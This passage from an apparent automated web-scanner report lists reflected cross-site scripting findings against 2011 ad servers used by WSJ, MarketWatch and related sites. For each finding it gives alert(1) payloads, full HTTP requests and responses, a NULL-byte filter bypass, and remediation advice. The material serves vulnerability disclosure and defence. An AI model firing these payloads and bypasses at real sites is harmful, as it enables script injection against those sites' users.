document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/v;231254172;0-0;0;25648719;255-0/0;42027515/42045302/1;;~okv=;!category=82c81'-alert(1)-'2dfd7f2477e;~aopt=2/1/ff/1;~sscs=%3fhttps://order.barrons.com/sub/xdef/002/onlinecontrol2_OOTB">
...[SNIP]...

4.40. http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/front_nonsub

Issue detail

The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da49b'-alert(1)-'818ab72d4b9 was submitted in the !category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/interactive.wsj.com/front_nonsub;!category=;;mc=b2pfreezone;tile=8;sz=336x280,300x250;ord=6698669866986698;da49b'-alert(1)-'818ab72d4b9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub;!category=;;mc=b2pfreezone;tile=8;sz=336x280,300x250;ord=6698669866986698;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 14 May 2011 10:09:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 405

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/b;207642204;5-0;0;29743509;4307-300/250;42034612/42052399/1;;~okv=;!category=;;mc=b2pfreezone;tile=8;sz=336x280,300x250;da49b'-alert(1)-'818ab72d4b9;~aopt=6/1/ff/1;~sscs=%3fhttp://lpsummit.dowjones.com">
...[SNIP]...

4.41. http://ad.doubleclick.net/adj/marketwatch.com/brokerdock [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/marketwatch.com/brokerdock

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 974bb'-alert(1)-'8599316508e was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/marketwatch.com/brokerdock;s=974bb'-alert(1)-'8599316508e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 439
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:30:26 GMT
Expires: Sat, 14 May 2011 10:30:26 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/f;225017382;0-0;0;46413550;255-0/0;36796821/36814699/1;;~okv=;s=974bb'-alert(1)-'8599316508e;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_WhatIsWorkingNow?dist=IAEHM1AFW">
...[SNIP]...

4.42. http://ad.doubleclick.net/adj/marketwatch.com/brokerdock [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/marketwatch.com/brokerdock

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %001fc0f'-alert(1)-'57189850f8e was submitted in the u parameter. This input was echoed as 1fc0f'-alert(1)-'57189850f8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/marketwatch.com/brokerdock;u=%001fc0f'-alert(1)-'57189850f8e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 51904
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:13:58 GMT
Expires: Sat, 14 May 2011 10:13:58 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
://ad.doubleclick.net/activity;src=1363789;stragg=1;v=1;pid=46413550;aid=240691320;ko=0;cid=41978572;rid=41996359;rv=1;rn=3125182;";
this.swfParams = 'src=1363789&rv=1&rid=41996359&=%001fc0f'-alert(1)-'57189850f8e&';
this.renderingId = "41996359";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

4.43. http://ad.doubleclick.net/adj/marketwatch.com/frontpage [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/marketwatch.com/frontpage

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2415'-alert(1)-'77ea14b7b01 was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/marketwatch.com/frontpage;u=a2415'-alert(1)-'77ea14b7b01 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 469
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:14:01 GMT
Expires: Sat, 14 May 2011 10:14:01 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/f;225017382;0-0;0;13112443;255-0/0;36796821/36814699/1;u=a2415'-alert(1)-'77ea14b7b01;~okv=;u=a2415'-alert(1)-'77ea14b7b01;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_WhatIsWorkingNow?dist=IAEHM1AFW">
...[SNIP]...

4.44. http://ad.doubleclick.net/adj/marketwatch.com/markets_futuremovers [p39 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/marketwatch.com/markets_futuremovers

Issue detail

The value of the p39 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47048'-alert(1)-'ca7e230a304 was submitted in the p39 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/marketwatch.com/markets_futuremovers;p39=47048'-alert(1)-'ca7e230a304 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 441
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:28:53 GMT
Expires: Sat, 14 May 2011 10:28:53 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/f;225017382;0-0;0;13112524;255-0/0;36796821/36814699/1;;~okv=;p39=47048'-alert(1)-'ca7e230a304;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_WhatIsWorkingNow?dist=IAEHM1AFW">
...[SNIP]...

4.45. http://ad.doubleclick.net/adj/marketwatch.com/mutualfunds_jaffe [p39 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/marketwatch.com/mutualfunds_jaffe

Issue detail

The value of the p39 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7b36'-alert(1)-'24206ab45ed was submitted in the p39 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/marketwatch.com/mutualfunds_jaffe;p39=d7b36'-alert(1)-'24206ab45ed HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 441
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:31:41 GMT
Expires: Sat, 14 May 2011 10:31:41 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/m;225017382;0-0;0;13314513;255-0/0;36796821/36814699/1;;~okv=;p39=d7b36'-alert(1)-'24206ab45ed;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_WhatIsWorkingNow?dist=IAEHM1AFW">
...[SNIP]...

4.46. http://ad.doubleclick.net/adj/marketwatch.com/personalfinance_story [p39 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /adj/marketwatch.com/personalfinance_story

Issue detail

The value of the p39 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fda9'%3b268fe484bfd was submitted in the p39 parameter. This input was echoed as 4fda9';268fe484bfd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/marketwatch.com/personalfinance_story;p39=4fda9'%3b268fe484bfd HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 431
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:33:56 GMT
Expires: Sat, 14 May 2011 10:33:56 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/c;225017382;0-0;0;13112615;255-0/0;36796821/36814699/1;;~okv=;p39=4fda9';268fe484bfd;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_WhatIsWorkingNow?dist=IAEHM1AFW">
...[SNIP]...

4.47. http://ad.doubleclick.net/adj/smartmoney.com/intromessage [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/smartmoney.com/intromessage

Issue detail

The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c732'-alert(1)-'7486eaba3ca was submitted in the !category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/smartmoney.com/intromessage;!category=8c732'-alert(1)-'7486eaba3ca HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/static_html_files/smartmoney/smIntro.html?page=http://www.smartmoney.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 435
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:15:37 GMT
Expires: Sat, 14 May 2011 10:15:37 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/g;225696705;0-0;0;63658510;255-0/0;37134400/37152278/1;;~okv=;!category=8c732'-alert(1)-'7486eaba3ca;~aopt=2/1/ff/1;~sscs=%3fhttps://w1.buysub.com/servlet/OrdersGateway?cds_mag_code=SMY&cds_page_id=66975&cds_response_key=IDFGODAB">
...[SNIP]...

4.48. http://api.bizographics.com/v1/profile.json [&callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the callback request parameter (named &callback above because the query string begins with a stray &) is echoed at the start of the response body as the name of the JSONP callback function. The payload af121<script>alert(1)</script>e1480b57813 was submitted in the parameter and was echoed unmodified in the application's response.

This proof-of-concept shows that the parameter is reflected without filtering, but the response is served as application/json: a browser sent to this URL directly treats it as data, not HTML, so the script tag is displayed rather than executed. The real exposure is the JSONP pattern itself. A page that loads this URL as a script runs whatever callback expression the URL names, in that page's origin, so an attacker who can influence the script URL gains code execution there; the callback value should be restricted to a plain identifier (letters, digits, dots and underscores) before it is written out.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoDataaf121<script>alert(1)</script>e1480b57813&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Sat, 14 May 2011 10:09:39 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=ba7ddfef-d5fe-4ab1-884d-c9a4dc879d96;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZLPZflIrFqisaj5XcunNcMDa7Re6IGD4lJipjjGNqtjAeAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRNLp9SGVM52IisJ2j66T44ZEVUJBxdqAyByxo0BnkxYHGMekeOMTo9anMP2vW0cZuIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 219
Connection: keep-alive

dj.module.ad.bio.loadBizoDataaf121<script>alert(1)</script>e1480b57813({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

4.49. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is echoed inside the body of a 403 error response. The payload 79904<script>alert(1)</script>02362a720da was submitted in the api_key parameter and was echoed unmodified in the message Unknown API key: (...).

The reflection is unfiltered, but the response is a text/plain error message, which browsers display as text rather than parse as HTML; on its own the scanner's High rating overstates this item. It would only become exploitable if something downstream re-labels or sniffs the body as HTML, so it is still worth HTML-encoding the key in the error message or, better, not echoing it at all.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun79904<script>alert(1)</script>02362a720da HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 14 May 2011 10:09:42 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun79904<script>alert(1)</script>02362a720da)

4.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ifl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the ifl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52260"%3balert(1)//f14c2507aa2 was submitted in the ifl parameter; %3b is the URL-encoded semicolon and the server decoded it, so the value was echoed as 52260";alert(1)//f14c2507aa2 in the application's response: the quote closes the string, the semicolon ends the assignment, alert(1) runs, and // comments out the rest of the line.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Although the response is labelled text/html, this cn=rsb variant returns bare JavaScript (the body begins at var ebPtcl=, with no script tag), so the code runs where the URL is loaded as a script rather than when it is opened as a page.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2284375&PluID=0&w=336&h=280&ord=3268510&ifrm=1&ifl=$$/static_html_files/addineyeV2.html$$52260"%3balert(1)//f14c2507aa2&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/n%3B239950972%3B0-0%3B0%3B46249204%3B4252-336/280%3B41839080/41856867/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bpage%3Drightrail%3Bmsrc%3DBOL_other_tnav_analysis%3Bbiz%3D1053%3B%3Bs%3D8_10001%3Bmc%3D0%3Btile%3D9%3Bsz%3D300x250%2C336x280%2C300x600%2C336x850%3B%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3f$$&z=39 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/barrons.com/daily_barronstake;!category=;page=rightrail;msrc=BOL_other_tnav_analysis;biz=1053;;s=8_10001;mc=0;tile=9;sz=300x250,336x280,300x600,336x850;ord=2826282628262826;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C_4248=4844349; C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPi0cOm00001idcDaMPm0cEt00001iuIZaMPl0aMI00001idcEaMPm0cEt00001jxYPaMPg0doZ00001iETRaMPm06b+00001; B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD8SlF0000000001uD8SlE0000000001uD9fOJ0000000001uC8VS90000000001uD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iGbIaMPF0cFA00001idcDaMPm0cEt00001iuIZaMPl0aMI00001iETRaMPm06b+00001jxYPaMPg0doZ00001idcEaMPm0cEt00001; expires=Fri, 12-Aug-2011 06:33:43 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD8SlF0000000001uD8SlE0000000001uD8VS90000000001uD9fOJ0000000001uC8JJn0000000001uD; expires=Fri, 12-Aug-2011 06:33:43 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:33:42 GMT
Connection: close
Content-Length: 1938

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
2928/Type-11/4891372_9c2005ba-abc0-47ac-a2a5-aa7bd1fb066d.js";ebO.fvp="Res/";ebO.dlm=1;ebO.bt=5;ebO.bv=11.000000;ebO.plt=9;ebO.ut=gEbUT;ebO.ifrm=1;ebO.oo=0;ebO.ifl="/static_html_files/addineyeV2.html$$52260";alert(1)//f14c2507aa2&ncu=";ebO.z=39;ebO.fru="http://bs.serving-sys.com/BurstingPipe/BannerRedirect.bs?cn=brd&FlightID=2284375&Page=&PluID=0&EyeblasterID=4891372&Pos=4067714151756&ord=[timestamp]";ebO.pv="_4_5_0";ebBv="_2_
...[SNIP]...

4.51. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ncu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the ncu request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d6139'><script>alert(1)</script>85c49d58796 was submitted in the ncu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BurstingPipe/adServer.bs?cn=sb&c=17&pli=2319721&PluID=0&w=300&h=250&ord=3142682&ifrm=1&p=&npu=$$$$&ncu=d6139'><script>alert(1)</script>85c49d58796 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C_4248=4844349; C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPj0cOm00001iuIZaMPl0aMI00001jxYPaMPg0doZ00001; B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD9fOJ0000000001uC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iuIZaMPl0aMI00001idcEaMPA0cEt00001jxYPaMPg0doZ00001; expires=Fri, 12-Aug-2011 06:28:47 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD8SlF0000000001uD9fOJ0000000001uC; expires=Fri, 12-Aug-2011 06:28:47 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:28:46 GMT
Connection: close
Content-Length: 2379

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
<a href='d6139'><script>alert(1)</script>85c49d58796http%3a//bs.serving%2dsys.com/BurstingPipe/BannerRedirect.bs?cn=brd%26FlightID=2319721%26Page=%26PluID=0%26EyeblasterID=4772648%26Pos=4067795209908%26ord=%5btimestamp%5d' target='_blank'>
...[SNIP]...

4.52. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ncu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the ncu request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cbdc</script><script>alert(1)</script>050f40894a4 was submitted in the ncu parameter. This input was echoed unmodified in the application's response. Because the payload closes the script element rather than the string, JavaScript-level escaping (a backslash before each quote) would not have stopped it: the HTML parser ends the script block at the first </script> it meets regardless of the JavaScript tokenizer's state, and the escape() call wrapped around the value runs only after parsing, so it offers no protection either.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BurstingPipe/adServer.bs?cn=sb&c=17&pli=2319721&PluID=0&w=300&h=250&ord=3142682&ifrm=1&p=&npu=$$$$&ncu=4cbdc</script><script>alert(1)</script>050f40894a4 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
